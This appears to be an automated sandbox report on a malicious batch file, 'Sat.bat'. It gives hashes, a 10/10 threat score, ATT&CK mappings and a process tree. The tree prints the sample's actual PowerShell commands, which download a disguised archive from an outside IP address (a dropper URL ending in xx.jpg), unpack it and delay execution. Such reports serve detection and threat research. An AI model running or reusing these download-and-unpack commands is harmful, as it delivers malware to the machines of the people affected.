3442a9e4f21d14a478076694bf1dd44268e950262270e7637936c05657531462

General

Target

Sat.bat
Size

2KB
MD5

0e2fff554ddadc58aaff7978ec06aa32
SHA1

b453b17905235ea96150c90711285f7879d3afc0
SHA256

64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80
SHA512

c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://109.199.101.109:770/xx.jpg

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

4 2092 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1736 powershell.exe
2092 powershell.exe
2152 powershell.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

1436 timeout.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1736 powershell.exe
1736 powershell.exe
1736 powershell.exe
2092 powershell.exe
2152 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1736 powershell.exe
Token: SeDebugPrivilege 2092 powershell.exe
Token: SeDebugPrivilege 2152 powershell.exe

flow	pid	process
4	2092	powershell.exe

pid	process
1736	powershell.exe
2092	powershell.exe
2152	powershell.exe

pid	process
1436	timeout.exe

pid	process
1736	powershell.exe
1736	powershell.exe
1736	powershell.exe
2092	powershell.exe
2152	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	2092	powershell.exe
Token: SeDebugPrivilege	2152	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.execmd.exe

description	pid	process	target process
PID 2552 wrote to memory of 1736	2552	cmd.exe	powershell.exe
PID 2552 wrote to memory of 1736	2552	cmd.exe	powershell.exe
PID 2552 wrote to memory of 1736	2552	cmd.exe	powershell.exe
PID 1736 wrote to memory of 1936	1736	powershell.exe	cmd.exe
PID 1736 wrote to memory of 1936	1736	powershell.exe	cmd.exe
PID 1736 wrote to memory of 1936	1736	powershell.exe	cmd.exe
PID 1936 wrote to memory of 2092	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 2092	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 2092	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 2152	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 2152	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 2152	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 1436	1936	cmd.exe	timeout.exe
PID 1936 wrote to memory of 1436	1936	cmd.exe	timeout.exe
PID 1936 wrote to memory of 1436	1936	cmd.exe	timeout.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1736
- - C:\Windows\system32\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2152
  - - C:\Windows\system32\timeout.exe
      timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2b8f1c6a03d9dfe38a97ef437cb49f91

SHA1
31cf386ba675a25ffcc3e8a64ce0cb92ab7f3f4c

SHA256
bc985cc0c909c633d2283b827cd051a35cee9fbbfd607be4aaaecccce239a79a

SHA512
837b126a8fbc53ac5d6455abf21a21765227ef27546b4d7557743d766914c1bb04b7e9c3437a5e582e9cfdb5efa3c5dea79024bbd5c5cdea58dc4fe55182c83e

Download Submit
memory/1736-4-0x000007FEF5C7E000-0x000007FEF5C7F000-memory.dmp

Filesize
4KB

Download
memory/1736-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

Filesize
32KB

Download
memory/1736-5-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

Filesize
2.9MB

Download
memory/1736-8-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1736-7-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1736-9-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1736-10-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/1736-11-0x000007FEF59C0000-0x000007FEF635D000-memory.dmp

Filesize
9.6MB

Download
memory/2092-17-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2092-18-0x0000000001D10000-0x0000000001D18000-memory.dmp

Filesize
32KB

Download

Analysis

Sharing